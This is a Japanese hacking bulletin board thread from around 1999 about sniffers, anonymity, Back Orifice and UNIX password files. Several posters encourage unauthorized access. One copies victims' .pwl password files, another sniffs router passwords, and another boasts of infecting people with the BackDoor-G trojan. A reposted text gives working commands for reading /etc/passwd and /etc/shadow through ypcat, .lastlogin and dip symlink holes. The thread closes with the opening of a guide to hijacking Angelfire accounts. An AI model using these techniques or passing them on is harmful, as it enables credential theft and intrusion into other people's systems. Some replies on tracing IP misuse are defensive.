まだ、hack駆け出しだった頃（ま、今も見習いみたいなもんですが^^;）
Usr:admin Pass:adminで入れた、地方の弱小ISPがありました
まぁ、管理者も腑抜けなんですが、入った自分もZapなんざ知らなかったので
足跡べったりで、数日後の契約ISPから警告が来ましたとさ♪

あれから、自分も管理者の端くれとなりましたが、会社がネット関連に経費使いたがらないので
まだ、ダイアルアップなのが助かります(^^;

> さて本題、今アメリカでハッカーたちが暴れてるみたいですが、そういったこと
> する時匿名性をあげる為にはどうしたらようでしょうか？

公衆電話から電話。さらに
その公衆電話の番号を他人の番号にスリ変えて、なおかつ
電話交換機から記録を消去し、いろんな国の回線を経由して、
ＡＰに繋ぎ、２００個くらいのサーバを経由してターゲットに接続。笑い
アチラの人はマジでこういうことやってそうだから恐い。
なにかとあればダイヤルアプつー単語出てくるし(笑)


>　ＵＮＩＸでユーザー定義ファイル内のパスワードにシャドウがかかってたとき
>どうしたらよいでしょ

root権限を奪えばよいです。

ヽ(´ー｀)ﾉ 

参考：06月10日(木)19時42分42秒

> Windowsベースだと高そうなので、
> ＵＮＩＸインストールしてフリーのスニファ入れるってのもいいですね。
> 結構高性能なやつもでてます。
> わたしはWinのnetXray使ってますけど(笑)

フリーならLinuxやDOS用でフロッピーで持ち歩けるようなのがいいですよ
キャプチャーできるデータ量が少ないのが欠点ですが。

NetXrayは最初のバージョンのベータから使ってますが、よく出来ています(笑)

参考：06月10日(木)16時13分23秒

メールアドレスカッコイイなぁ、、、、、、

はじめまして。
オイラはまだまだ素人ですが、ハッカー（悪い意味の）になるつもりはありませ
ん（←がっこのＰＣ使って諸大学をハックしている僕の言えることではない）。
ですが、やっぱりスキルをあげるにはこの世界が一番だと思います、世界的に見
てもそうです。
さて本題、今アメリカでハッカーたちが暴れてるみたいですが、そういったこと
する時匿名性をあげる為にはどうしたらようでしょうか？　ＵＮＩＸでユーザー
定義ファイル内のパスワードにシャドウがかかってたときどうしたらよいでしょ
うか？　　聞きたいこと聞きまくってる僕ですがどうか暇な方教えてください。

返事を期待するなら匿名メールはやめてくださいね。
で、hotmailから送られてきたメールです。

>映画で、自分のメールアドレスを見せずに相手にメールを送っていたのですが
>そんなことは、ほんとに出来るんでしょうか?
>僕は、コンピュータを触り始めてまだ2ヶ月です。
>こんな素人にでも出来るんでしょうか?

２ヶ月でhotmail使えればたいしたもんです。笑い
メールアドレスを見せるっていうのは自己申告制なので
一応メールアドレスを知らせずにメールを送ることは出来ます。

そもそもがhotmail自体匿名メールみたいなもんでしょうに。
ＲＦＣとかそこらのマニュアル読みましょう。

Windowsベースだと高そうなので、
ＵＮＩＸインストールしてフリーのスニファ入れるってのもいいですね。
結構高性能なやつもでてます。

わたしはWinのnetXray使ってますけど(笑)

東洋テクニカ扱いでは、
Expert Sniffer (dos)
Sniffer Pro(win)
Sniffer Basic(win)
NetXray(win)
とあります。
価格は20万〜300万ほど、更に高度な物もあるが
ATM,ISDNなどの解析に使うモジュールアダプターとも
揃えると1000万超になることも・・・

その関連の技術セミナーや説明会などで、私に会ったら声かけて下さい。(笑)

Expert Snifferという製品のことっす。
↓

> 初めてこの掲示板を拝見させていただきましたが、かなりハイレベルで勉強になります。snifferというものは、聞いたことはあるのですがどういうものか分かりません。教えてください。

snifferというのは、ＬＡＮアナライザのことでＬＡＮ上のパケットをモニター
したりいろいろ解析したりする装置のことです。
たしか、NetworkGeneral という会社の製品で日本では東陽テクニカという
会社が扱っています。
昔は、ＤＯＳ上で動くソフトでハードウエアと一体化させて売っていたのですが
最近は、Windowsにインストールして使うものがでていると思います。
ＬＡＮアナライザーそのもは、いろいろなメーカーのものがでていて値段も
安いもの高いものありますが、snifferがやはり有名です。
あと使い安いですね。

参考：06月09日(水)20時31分23秒

> ルーターというのはゲートウェイのことですよね？両者の違いがいまいち良く分からないです。
> ここのセグメントからインターネットへはゲートウェイを経由して謎のホストを通り、最後にプロキシを経由しています。
> そのゲートウェイはポート２１、７９が開いているのですがこれはコンピュータということでしょうか？
> ここからパスを拾うとは、つまりルーターをのっとってスニファーしかけるというでしょうか？
> ルーターとスニファーの勉強がしたいです。どこかに良いサイトがございましたら紹介していただけたら幸いです。
> インターネットサーバーを管理するにはまだスキルが足りないです。質問が多くてすいません。精進せねば！

ルーターとはルーティングをするマシンでハードを示すのに使うでしょう
ゲートウェイはサブネット外への通信の中継で環境を示す。または うしパソ :-)

sniffするというのは同一サブネット内に特権ユーザーがいて、彼が「仕事」をするのを
見張るということ。

勉強ならば、本を買って読むのが早い

参考：06月09日(水)23時06分42秒

> Ｇｏｏなどのロボット型エンジンに,ｅｔｃ　ｐａｓｓｗｄといれると,
> ディレクトリが丸見えのサーバーがつらつらと出てきますが,ｐａｓｓｗｄ
> ファイルを覗いたり,保存したりするのは不正アクセスになるのでしょうか？
> もしくは,サーバーの管理者から怒られるようなことになるんでしょうか？

AnonymouseFTP の場合、/bin /etc /pub と見えますよね。それの/etc/passwdでは
ないのですか？ ならば、たいして役に立たないと思いますよ。

検索されるようなファイルは見せるためのファイルなんで怒られる事は無いでしょう。
万が一、管理者の設定ミスで・・・これも考えにくいかな・・・
あるとすれば、ヘボサイトがクラックされそのような状態に変えられていた
(背中に落書きされた状態)のものなら暇つぶしでjohnしてもいいけど・・・
そんな暇があったらオライリー本読んでたほうが良い。

不正アクセスの話はこれから厳しくなくるかも知れませんね。
管理者の能力不足や設定ミスであっても、特定のファイルにアクセスを試みる事が
「不正アクセス」とされるようになるでしょう。

数年前だが、0120で始まるフリーダイヤル番号から接続できる企業のサーバーがあり、
(もちろん今でも沢山ある)
そこは管理の手抜きか、セキュリティ意識の欠落かで、ID = guest、PASS = guest で
ログインが出来た。しかもそのguest IDは通常のユーザーの権限を持つ社員の共用IDだった。

しかし、その企業は不正アクセスの届けを出し、新聞、TVニュースなどで報道させることに
なりました。接続時の画面に「Welcome!! Please LOGIN !」と表示され、guestでloginした事を
不正アクセスとし、見ただけのファイルを盗み出されたとされていました。

参考：06月09日(水)15時59分37秒

ルーターというのはゲートウェイのことですよね？両者の違いがいまいち良く分からないです。
ここのセグメントからインターネットへはゲートウェイを経由して謎のホストを通り、最後にプロキシを経由しています。
そのゲートウェイはポート２１、７９が開いているのですがこれはコンピュータということでしょうか？
ここからパスを拾うとは、つまりルーターをのっとってスニファーしかけるというでしょうか？
ルーターとスニファーの勉強がしたいです。どこかに良いサイトがございましたら紹介していただけたら幸いです。
インターネットサーバーを管理するにはまだスキルが足りないです。質問が多くてすいません。精進せねば！

初めてこの掲示板を拝見させていただきましたが、かなりハイレベルで勉強になります。snifferというものは、聞いたことはあるのですがどういうものか分かりません。教えてください。

> そろそろインターネットサーバーをデビューさせたいと思っているのですが、
> ファイアウォールの内からではやはり無理ですよね？

ＦＷ内に外部からアクセスできるモノを置くのはどうでしょう？
潜在的なセキュリティホールになると思うので、
ＷＷＷとかだったら、ＷＷＷ専用のマシンを別セグメントに置くのがよいと思います。

参考：06月09日(水)12時08分21秒

> 始めまして.ドキュメントやＦ＆Ｑにはとてもお世話になってます.
> 
> 最近,私にとって面白いことがあったのですが,その行為が違法なのかどうなのかきになったので,皆様方の知識を少し借りられたらと思い,ここにきました.
> Ｇｏｏなどのロボット型エンジンに,ｅｔｃ　ｐａｓｓｗｄといれると,ディレクトリが丸見えのサーバーがつらつらと出てきますが,ｐａｓｓｗｄファイルを覗いたり,保存したりするのは不正アクセスになるのでしょうか？

例えばどこら辺でしょうか？
/etc/passwdといえばＵＮＩＸだと思うのですが、
httpのルートを/etcにするところなんて狙ってる以外あり得ない気がしますが(笑)

参考：06月09日(水)15時59分37秒

いつも勉強させて頂いてます。ところで、エクセルやワードで作ったもののパスワードをあけるのには
どのような方法があるのでしょうか？
エクセル97とワード98です。アドバイスを下さい！
いつもありがとうございます。

始めまして.ドキュメントやＦ＆Ｑにはとてもお世話になってます.

最近,私にとって面白いことがあったのですが,その行為が違法なのかどうなのかきになったので,皆様方の知識を少し借りられたらと思い,ここにきました.
Ｇｏｏなどのロボット型エンジンに,ｅｔｃ　ｐａｓｓｗｄといれると,ディレクトリが丸見えのサーバーがつらつらと出てきますが,ｐａｓｓｗｄファイルを覗いたり,保存したりするのは不正アクセスになるのでしょうか？
もしくは,サーバーの管理者から怒られるようなことになるんでしょうか？
私はｗｉｎｄｏｗｓも満足に動かせないような者なので,ｐａｓｓｗｄファイルを見る以上のことは出来ませんし、やっていません.それは後々勉強していけば良いと思うのですが,この行為自体が違法なのかどうかが,わからないので,質問させていただきました.

なれない敬語を使っているので,読みづらかったらすいません.(汗
それでは,失礼いたします.

> パスとかはsnifferするまでもなく、ypcatですべて表示されてしまうという有様です。
ん？snifferの方が断然楽でしょ、タイプしたパスがそのまま読めるんだから

> サーバーとかも自由にたてられますが、ローカルでしかアクセスできません。
> そろそろインターネットサーバーをデビューさせたいと思っているのですが、
> ファイアウォールの内からではやはり無理ですよね？

NATのルール追加ができなければ無理でしょう。
ルーターのコンフィグレーションを学び、snifferでenable passwordを拾える
事ができれば、一回り世界が広がります。snifferでフィルタするIPは
tracerouteで見るばいい。必要なrouter知識はcisco、YAMAHA、BeyNetworks
あたりは必須。HPのセキュリティHUBも知っていて損はないでしょう。

参考：06月09日(水)12時08分21秒

>自由度の高いネットワークではないでしょうか?
はい、かなり高いですね。なんでもいくらでもつなぎほうだいですからね。
ファイアウォールで外部に対してはある程度強いようですが、内部に対しては・・・
パスとかはsnifferするまでもなく、ypcatですべて表示されてしまうという有様です。
アカウントに対してもＩＰや、ＭＡＣなどの制限はまったく設けられておりません。
やはり大学のなかでもこのようなネットワークは制限が甘いのでしょうか？
サーバーとかも自由にたてられますが、ローカルでしかアクセスできません。
そろそろインターネットサーバーをデビューさせたいと思っているのですが、
ファイアウォールの内からではやはり無理ですよね？

はじめまして。ちゃんと申します。
いつも勉強させてもらっています。

便乗質問なのですが、パケットの情報を書き換えたり、
MACアドレスを偽ったりすることも可能なのですか。。。

もしも上記のようなことを実際に試してみたい場合、
具体的にどのようなことを憶えておくと良いのでしょうか？

内部ユーザーからの不正アクセス対策という話であれば、
大学という環境では厳重なセキュリティを施すのはまれでしょう。
ネットワークコンピューテングの基礎習得も兼ねている環境なら
自由度の高いネットワークではないでしょうか?

私も昔は、「学校へ行くのはsnifferするため」でしたからね。
スニファで拾ったpasswordを使ってログインをするときに、
ルーターのaccess-listや、TCPwapperを潜り抜けるため
ホストアドレスを書き換えるのが通常のパターンかな、、

ワンタイムパスにするかSSLなんかで暗号化するのが簡単にまずまず
の環境にする手っ取り早い方法でしょう。というかこのレベルは必須かも

> 偽ること出来ますけどね。

パケットジェネレーターなどでは、ヘッダ、データとも自由に書けますからね
フレームの頭から終りまで全bit書ける。

また、NICのROMそのものまで書き換えor差し替え可能ですし。

ソースを見れば解ると思うが、通信は自己申告だから

偽ること出来ますけどね。

やはりＭＡＣアドレスしかないですか。
Rocketさん☆さんどうもありがとうございました。
やはり噂どおりこのサイトにはすばらしいハッカーが多いですね。
勉強になります。これからもちょくちょく来るかもしれませんがその時はよろしくお願いします。

RZさんの記事読みました。
ツールとかわかりやすくて面白かったです。
冷蔵庫とか（笑）
あの手の本は技術よりエッセイの方が面白い（笑）
色々参考になりました。

> はじめまして。某Ａ大学の者です。
> 少し気になることがあるのですが、どなたか良い方法を御存知でしたらアドバイスをおねがいします。
> うちの学校では校内にＬＡＮ設備が整っておりまして、ＩＰを申請すれば誰でも自分の端末をネットワークにつなげることができます。
> このローカルの固定ＩＰの不正使用、つまり勝手に他人のものを用いることが問題になっております。
> 各種デーモンのログにはホストネーム（ＩＰ）しか記載されませんので端末（個人）を特定できないわけです。
> そのＩＰで自分のメールを送るというようなトンマなことをしていれば別ですが・・・
> ともかくこのＩＰの不正使用を犯人を突き止める、もしくは防ぐ良い方法はないものでしょうか？

不正使用を防ぐのは、やはり Roket 氏が書かれているように
DHCPサーバーをたてるかマメなＩＰ管理（ツールか何かで）を行うのがいいと思います。
不正使用犯人を捕まえるのは、やはりＭＡＣアドレスで特定するしかないと
思います。
あと、同一セグメントにあって、クライアントのＯＳがＷｉｎなら
nbtstatコマンドを使えばコンピューター名まで特定できます。
あとSniffer 等のLANアナライザをつかっても特定できます。

あと不正使用者のセグメントが特定されていて、いつも同じＮＩＣ
（ＬＡＮカードなど）を使っているのなら
ネットワーク管理者に申し入れて、そのＭＡＣアドレスをルーターで
フィルタリングすれば、その人のＰＣがセグメント外のネットに繋がらなくなるので
意図的に不正使用しているのなら不便を感じて止めると思います。

参考：06月07日(月)15時43分20秒

> このローカルの固定ＩＰの不正使用、つまり勝手に他人のものを用いることが問題になっております。
> 各種デーモンのログにはホストネーム（ＩＰ）しか記載されませんので端末（個人）を特定できないわけです。
> そのＩＰで自分のメールを送るというようなトンマなことをしていれば別ですが・・・
> ともかくこのＩＰの不正使用を犯人を突き止める、もしくは防ぐ良い方法はないものでしょうか？

はじめまして、
IPの不正使用者を突き止めるために、すぐにでも実施できる簡単な方法として
サーバーでarpテーブルをファイルに書き出すcronでもすればどうでしょうか？
普通はIP発行時に使用者、MACを台帳に付けてるでしょう。

完全に防止するとなると、IP発行方法の変更や設備投資が必要と思う。
IPアドレス管理製品もいくつかある。

完全防止とはいかないが・・・
各セグメントにDHCPサーバーを設置できるなら、MAC<->IPをスタティック
に割り振るルールーで動かし、route add -host連携でどうでしょう？

参考：06月07日(月)15時43分20秒

偶然にも欲しがっていた「BackDoor-G」を入手しました。
送り主はビル・クリントンになってましたが。
結構このソフト使えます。皆さんどんどん引っかかってくれます。
変種のアルマゲドンも欲しいのですが誰かありかを知ってます？

あの犬コロはちょっと失敗画像だったみたいです(笑)
文字部分に取り残した透明色が・・・

トップページの犬のモザイクがなんともカラフルでよいですね。
Linuxは巨大産業！ うーんまさにその通りですね、、
redhatのマスコットあれにしたらおろいのにー、って思ってしまいますね。

はじめまして。某Ａ大学の者です。
少し気になることがあるのですが、どなたか良い方法を御存知でしたらアドバイスをおねがいします。
うちの学校では校内にＬＡＮ設備が整っておりまして、ＩＰを申請すれば誰でも自分の端末をネットワークにつなげることができます。
このローカルの固定ＩＰの不正使用、つまり勝手に他人のものを用いることが問題になっております。
各種デーモンのログにはホストネーム（ＩＰ）しか記載されませんので端末（個人）を特定できないわけです。
そのＩＰで自分のメールを送るというようなトンマなことをしていれば別ですが・・・
ともかくこのＩＰの不正使用を犯人を突き止める、もしくは防ぐ良い方法はないものでしょうか？

Win98ではエージェント書き換え出来ない見たいです。
エクスプローラの関係でレジストリがフラッシュされるらしいです。
でも、もうちょっとがんばってみます。

サイト立ちあげてみました。一応、私なりのfeedbackということで。

http://ttj.virtualave.net/

icqhっていうのも効き目ないですね。
いいツールが落ちてないかなぁ。

> ターゲットとはICQやっていないのです。
> だからnetstatは無理なのではないのでしょうか？

…netstatは無理ですね。私ならここでお手上げ。
ICQ関連のツールはどうも危なっかしいのが多いので…。

参考：06月04日(金)23時20分06秒

レスありがとうございます。
 
> DOS窓を開いて netstat で一発ですね。

ターゲットとはICQやっていないのです。
だからnetstatは無理なのではないのでしょうか？

参考：06月04日(金)23時01分11秒

初めまして。

> ターゲットはIPを隠すというモードですが、何とかIPを抜きたいんです。

DOS窓を開いて netstat で一発ですね。

参考：06月04日(金)22時29分32秒

初めまして。

> 暗号のかかったファイルの開き方

パスワードのかかったzipのことでしょうか？それなら専用のcrackerが
山ほど有りますが…。

参考：06月04日(金)19時39分13秒

最近のICQって未だにセキュリティーが甘いって言っているみたいだけど、
Snifferは全く反応ないし、
ICQeyeは予期せぬエラーとか出て反応無し。
ターゲットはIPを隠すというモードですが、何とかIPを抜きたいんです。
webでは串ばかりつけているからIPまではわからなくて・・・
何か解決方法があったら教えて下さい。

暗号のかかったファイルの開き方など勉強したいです。
どなたかアドバイスをいただけないでしょうか？
ここで勉強させていただいてます。
宜しくお願いします。

BugTraqMLのどっかにある件、わかりました。
ここの記事、いつも楽しく勉強させていただいてます。
ありがとうございます。

参考：06月02日(水)12時04分33秒

時間が空き次第アプします。
オリジナルならBugTraqMLアーカイブのどこかにありますので
探してみてください。

このサイトが、新しくなる前(wingateについての説明が有った時代)
ＴＣＰ／ＩＰソケットの強制切断についての説明がＣソース付きあったような
気がするのですが、その当時の記事お持ちの方おられましたら
ご配布いただけないでしょうか？
よろしくおねがいします。

White_E 氏　ＲＺ氏　どうも有り難う御座いました。

なんとか従兄弟は駆除出来たみたいです。本当に有り難う御座いました。

＞ここにあります。
＞とりあえずウィルスチェックしましたので大丈夫かも？
＞信頼できるサイトから落す方が懸命のようなきもしますが(笑)

情報有り難う御座いました。

教えて頂いたサイトでは落とせました。　さっそく試してみます。

ここにあります。
とりあえずウィルスチェックしましたので大丈夫かも？
信頼できるサイトから落す方が懸命のようなきもしますが(笑)
ドメインがぁゃιぃし・・笑い

http://www.hackersclub.com/km/files/virus/

＞http://www.arez.com/fs/antigen/
＞Antigenを使いましょう。Back Orifice駆除ツールです。

情報ありがとう御座いました。助かります。

あれ？ダウンロードしようと思ったら、そのツール・・・・
Ｎｏｔ　Ｆｏｕｎｄ
The requested URL /fs/antigen102.zip was not found on this server.
でした。・・・ＲｅＧｅｔでやって見ても「状態・エラー」でした。

どうしよう・・・ゲットライトをＤＬして、それで今度はやってみます。

初めまして。

> 聴いて下さい。　Ｂｏ（バックオフィス）と言うツールがありますよね？
> 
> あれで、コントロールしたいＰＣで実行する透明なアイコンのＥＸＥがあります
> 
> が、あのＥＸＥを実行したＰＣで、ＥＸＥの常駐解除は可能なのでしょうか？
> 
> もし、可能なのでしたら・・・・・・すいませんが、教えて貰え無いでしょうか？

http://www.arez.com/fs/antigen/
Antigenを使いましょう。Back Orifice駆除ツールです。

http://www.cultdeadcow.com/merchandise/shirts.html
関係有りませんがBOのＴシャツ買った方います？(笑)

参考：05月30日(日)23時14分22秒

初めまして。友達がここにくれば勉強になるよって言ってくれたので来ました。

これからもちょくちょく来て、勉強させて貰います。

挨拶はこれで。　ここでちょっとみなさんには基本的な事なのでしょうが

聴いて下さい。　Ｂｏ（バックオフィス）と言うツールがありますよね？

あれで、コントロールしたいＰＣで実行する透明なアイコンのＥＸＥがあります

が、あのＥＸＥを実行したＰＣで、ＥＸＥの常駐解除は可能なのでしょうか？

もし、可能なのでしたら・・・・・・すいませんが、教えて貰え無いでしょうか？

従兄弟が困ってるので助けて上げたいのです。

いきなりこんな事を聴くのは失礼なのでしょうが、知っている方が居れば

教えてください。　お願い致します。

> でも、お金払わないと、一ヶ月くらいで消えちゃうんですよ

初めまして。tcupは有料化して期限内に入金しなくても消されません。
タイトルの上に広告を挿入されるだけです。放っておきましょう。

参考：05月29日(土)00時21分12秒

> .pwl関連のツールなら↓に良いのがありますよ。

どうもありがとうございます。こんなツールも見付けましたので報告。
http://www.picksoft.demon.co.uk/SeePWD/

それにしても、c:\windows\favoritesを覗けば大体の人物像が見えて
来ますね。"my_web"なんてディレクトリで整理していれば一発ですね。

参考：05月28日(金)12時56分40秒

でも、お金払わないと、一ヶ月くらいで消えちゃうんですよ
ほっといて、ログ調べられたら・・・
 やっぱり、素直にあやまったほうがいいんでしょうか？

ほっときゃええんちゃうん

.pwl関連のツールなら↓に良いのがありますよ。

http://webdon.com/vitas/pwl.htm

＞ところで匿名さん、
＞掲示板掲示板って、なんのどこのどういうシステムの掲示板でしょうか？
＞tcupとかの掲示板かな？
そうです、tcupの無料掲示板です。

＞私は４です。
私もそうなんですけど、自分の書いたプログラムほヨソに持って行ったり
webで公開したりした時のタブのズレを見ると、すんげー気持ち悪いです（笑）
最近は、公開前にはTAB->スペース変換かけるようになりましたけど...

TABキーは半角空白いくつ分に設定してますか？
私は４です。

ところで匿名さん、
掲示板掲示板って、なんのどこのどういうシステムの掲示板でしょうか？
tcupとかの掲示板かな？

あやまって掲示板をハッキングしてしまいました
それで、あわててバックしたら、その掲示板の背景色やタイトルカラー
などが全部変わっていました、なんとか元に戻したのですが、なぜか
有料掲示板に変わっていました。
どうしたらいいのか、わからずとても不安です
どなたか、対処法を教えて下さい

> system.iniにパスワードファイルの場所が書いてあるみたいです。
> そこから調べてダウンロードするといいかもしれません。
> ちなみにシステムファイルじゃないみたいです。

初めまして。
[Password Lists]で指定されているファイルですか？あれは恐らく
Windowsへのログオンパスワードファイルですよね。一応、入ったら
すぐに copy \windows\*.pwl c:\**** で持っていきますが、余程
の初心者でない限りダイヤルアップのパスワードは入力していないと
思うんです。
ちなみに .pwl のcrackingツールは現在探索中です。いいのが有れ
ば報告致します。

[本名].pwl のパターンが五割くらいなので、social engineering
を試みるなら、まあいい材料になりそうです(笑)。

参考：05月26日(水)23時24分20秒

> 私は家と職場でAIX,HP-UX,Solaris,IRIXを使用しています。
> そんで今度DOS/VにもUNIX環境をと考えているんですが、LINUXかBSDで迷ってます。
> どちらが良いのか？どんな違い(メリット)があるのか？
> 誰かアドバイス下さい。

はじめまして、私も仕事ではAIX、HP-UX、Solaris、Linuxを使用しています。
FireWallとMailサーバー管理が専門です。(天職に就くと毒が抜けますね)

自宅、モバイルともにLinuxを使っていますが、ハードの対応状況で
Linuxを選んでいます。最近の安くて高性能なパーツは、どちらかと言えば
Linuxで利用可能になる方が早いでしょう。

しかし、身近にユーザーがいればBSDもいい。
ハードの選択の参考になるし、話題も増える。
初心者なら解らないことを聞けばいいし、、、

私にはUNIXを教えてくれる人が全くいなかった為に散々苦労しました。
サービスプロバイダも無く個人ではUUCP接続でネットニュースの
アーカイブを手にいれるのと、オライリーの本だけが頼りだった。
これは今でも変わりませんね、さすがにUUCPでは無くなりましたが :-)
やはり、UNIXを教えてくれる人は身近にいません。

> リモートのWinにnet useでアクセスした際にISPの接続パスワードを
> 抜きたいのですが、やはりkeyloggingするしか手は無いのでしょうか。
> 私としては user.dat をcopyしたいのですが、システムファイルです
> から持って来れません。attribも効きません。
> 何か確実な方法を御存知の方、教えて下さると幸いです。

全Win共通かどうかわからないですが、
system.iniにパスワードファイルの場所が書いてあるみたいです。
そこから調べてダウンロードするといいかもしれません。
ちなみにシステムファイルじゃないみたいです。

参考：05月26日(水)02時54分00秒

> おぉっ。４台中２台も楽しそうなのが入ってますね（笑）
> 
> いろんなハク系・技術系のドキュメントはLINUXのが多いですからね。
> あと、infoで昔誰かが「攻めのLINUX、守りのFreeBSD」と言ってました。
> うーん。
> 

お、名言ですね(笑)
そういえばサブオペもそんなこといってたなぁ・・・

参考：05月26日(水)14時29分18秒

アドバイスありがとうございます。
とりあえずLinuxとNTのマルチブート環境にします。
DiskArrayとネゴシエーションしないと困るんで。
ハックスクリプトは自作のをLinuxに移植します。

じゃあとりあえずLinuxの「穴」でも探しますわ。

> 私は家と職場でAIX,HP-UX,Solaris,IRIXを使用しています。
おぉっ。４台中２台も楽しそうなのが入ってますね（笑）

> そんで今度DOS/VにもUNIX環境をと考えているんですが、LINUXかBSDで迷ってます。
いろんなハク系・技術系のドキュメントはLINUXのが多いですからね。
あと、infoで昔誰かが「攻めのLINUX、守りのFreeBSD」と言ってました。
うーん。

> 私は家と職場でAIX,HP-UX,Solaris,IRIXを使用しています。
> そんで今度DOS/VにもUNIX環境をと考えているんですが、LINUXかBSDで迷ってます。
> どちらが良いのか？どんな違い(メリット)があるのか？
> 誰かアドバイス下さい。

個人的にはLinuxが好き。
ハックスクリプトは大抵Linuxだし、
セキュリティ関係も結構そろってる。
Linuxは巨大産業だし（げら

周りにユーザーが多いのもおれが使ってる理由の１つだけど。



マークはBSD使ってるらしい。

参考：05月26日(水)10時56分28秒

私は家と職場でAIX,HP-UX,Solaris,IRIXを使用しています。
そんで今度DOS/VにもUNIX環境をと考えているんですが、LINUXかBSDで迷ってます。
どちらが良いのか？どんな違い(メリット)があるのか？
誰かアドバイス下さい。

リモートのWinにnet useでアクセスした際にISPの接続パスワードを
抜きたいのですが、やはりkeyloggingするしか手は無いのでしょうか。
私としては user.dat をcopyしたいのですが、システムファイルです
から持って来れません。attribも効きません。
何か確実な方法を御存知の方、教えて下さると幸いです。

MP3、エミュレータ、CD-R、ゲームボーイ、時事などのニュースページを作ってみました。日刊更新でバリバリ更新していきたいと思います｡
ちょっと重いページですが、よろしくお願いします。
今はニュースページですが、今後コンテンツ等も充実させたいと思っています。

http://www.uranews.com

いろいろな単位

http://www.nams.kyushu-u.ac.jp/~zaitsu/profile/mega.htm

私はIEは普段ほとんど使いません。変わりにNNの4.6と3.03を使っていますが・・
やっぱり、NNを２バージョン入れるととどうしてもUSER_AGENTが変更されていません。
どうやら、ProxyLauncherは普段使うように指定されているブラウザを変更するようで・・・。

実際、NN両バージョンをインストールしてからProxyLauncherを起動すると
どうしてもバージョンが上の（普段使うように指定されている）ブラウザに指定がいってしまうようです。
今、何とかして共有できないかと考えていますが・・・。

NNまでのパスを変えたりNN3.03だけの時に変更して、NN4.6を入れたりしてみましたが・・

もしかしたらコレはすごく当然の事かもしれないのですけど
私は知識がないのでこんな所でつまっています。
出来れば、アドバイスなどを頂けたら幸いです。

ゆうせんのｗｅｂサイトで現在かかってるチャンネルの内容を表示するcgiあるんだけど、
これがすごい。かかってる曲の秒数でリフレッシュしてる。
残り時間が35秒とかだとちゃんとリフレッシュ35secになってる。

うーむ、さすが。
（ってなんのことはない雑談なんだけど）

私はIE4.01とNN3.03を使っていますが、ProxyLauncherを使ってNNで
env.cgi等にアクセスしてもUSER_AGENTが変更されません。併用すると
駄目なようです。私だけかな？

======= SHADOW.TXT ======= 旧DEF CON ZERO E-TEXTより拝借

これはshadowファイルを手に入れる為の完璧な方法でも良い方法でも
ないが、気ままにcrackをするなら知っておくと便利だろう。

Unix : SunOS, SCO, System V, その他
これらは時々ypcatの攻撃に弱い。これは古くてよく知られたトリック
だが成功する…。使用法だが、単に
ypcat /etc/passwd
と打つか、又は
ypcat /etc/passwd > ~/passwd
そしてpasswdを君のホームからダウンロードするといい。


Unix : SCO, System V 3.2, ?,
これらは .lastlogin ファイルを使う穴に弱い。
君のホームで
ls -al
と打って .lastlogin がauthやrootその他君よりもセキュリティ面
で上位のユーザに所有されていた場合、非常に美味しい :)

rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd

ログアウトしてから戻って来る。

cat .lastlogin > passwd
rm -f ~/.lastlogin

この穴は他にも数通りの使い道が有る。君はシステムの殆どの
ファイルを読めるのだから。


Linux : slackware, ?,
dipの穴はrootを取るexploitとしても使えるが、shadowファイルを
正当に簡単に手に入れるのにも使える。何故君がそれを使ってroot
を取って、それから shadow を編集したりダウンロードしないのか
さっぱり分からないが、とにかくやってみよう…。

ln -s /etc/shadow /tmp/dummy.dip
/sbin/dip -v /tmp/dummy.dip

傲慢なdipはshadowをタイプするだろう。そして勿論、それはただ単に
shadowを読むだけに限定されている訳ではない…。

もし君が他のトリック、特にlinuxの shadow の取り方を知っていて
それを共有したいなら、Cassidyにメールをくれ…。

参考：05月23日(日)14時16分40秒

レスありがとうございました。
なるほど、そういう事だったんですね。
これから、古いバージョンで試してみようと思います。
これからはもっとよく見てから質問します。

|（機能説明）
|　ブラウザ自体のproxy設定と多段が簡単に設定できます。
|　USER_AGENTを自由に変更できるなりきりブラウザの上位ソフトです。
|　※Netscape4x以降やInternet Explorer4x以降ではUSER_AGENTの変更はできません。

ということです。

参考：05月22日(土)17時17分49秒

初心者的な質問で申し訳ありません。
DA社のProxyLauncherを使ってHTTP_USER_AGENTを変更しても
実際変更されてません。やっぱり、Win95専用なのでしょうか？
ちなみに、NN4.51でWin98です。

ども　レスさんくすです。
５月と聞いたけど６月になったのですかぁ。それじゃハッカージャパン４より遅いのかな（笑）
技術的ネタが没になったのはホントに残念。
私も実は期待していたんだけどやっぱり出版となると堅くなっちゃうんですね。
悪マニュ３を期待していますぅ。

最近、UG本を集めるのが趣味になって困っています（笑）

> あれっていつ発売でしたっけ？
> 予約はしているけど発売日がわからないし（笑）
> RZさんの記事もあるんですよね。買いますよぉ〜〜〜

６月らしいです。っていうか未定。
私の記事は１５ページ分のっていますが、
全て私のサイトに載っている内容そのままですよ(笑)

技術的なヤツはＮＧくらったので(簡単なのに・・・)
悪マニュ３に載せようかと思ってます。

もちろんサイトにも載せますけど(笑)

参考：05月21日(金)23時28分52秒

あれっていつ発売でしたっけ？
予約はしているけど発売日がわからないし（笑）
RZさんの記事もあるんですよね。買いますよぉ〜〜〜

> はじめまして。
> 
> ログ読ませてもらいました。ここもいろいろやってますね。海外サイトの真似が多いようだけど。

ども。最新情報は海外からなので、どうしてもそうなっちゃいますね。
てゆーか、こんな感じのサイトってどこらへんとかぶってます？

オープンなｗｅｂでの公開はなかなか難しいもんです。
でわ、またいらしてください。

参考：05月20日(木)07時46分43秒

はじめまして。

ログ読ませてもらいました。ここもいろいろやってますね。海外サイトの真似が多いようだけど。

JavaのIP抜きならちょっと前のOpenDesignをみればわかるはずです。。カンタン。
TCUPセキュリティぼろぼろですよね。あんなんで金取ってるんだからねぇ。でもあ
んなのを攻撃するのは時間の無駄というものでしょう。
eggdropはバックドアの代わりに仕掛けて帰る人がたまにいますね。便利なのかも。

けっこうまともなHackerが集まってるみたいなので、また来ます。

Vlad氏が訳していたテキストの続編です。
これももう誰か訳しているかな？(笑)

============================
Hacking Angelfire 
by f1ber 0pt1k
(f1ber_0pt1k@hotmail.com)
(http://www.uha1.com)
----------------------------

Introduction

去年の始め、私はeZoOns氏が書いたAngelfireのhackingに関する記事を
見つけた。そのsocial engineering理論とAngelfireのhack理論は大した
ことはなかった。私はもう少しましな記事を書いてみよう。
これが教育的な目的の為に書かれていることと、あなたがこの情報から
何をしようと私に責任が無いことを覚えておいて欲しい。

First Things First

あなたはAngelfireにloginした直後に受け取るページを手に入れなけれ
ばならない。このページはBEDIT.HTMLと呼ばれ、<html>から2,3行下に
彼らのパスワードが有る。

<font color=teal>Your page <a href="http://www.angelfire.com/
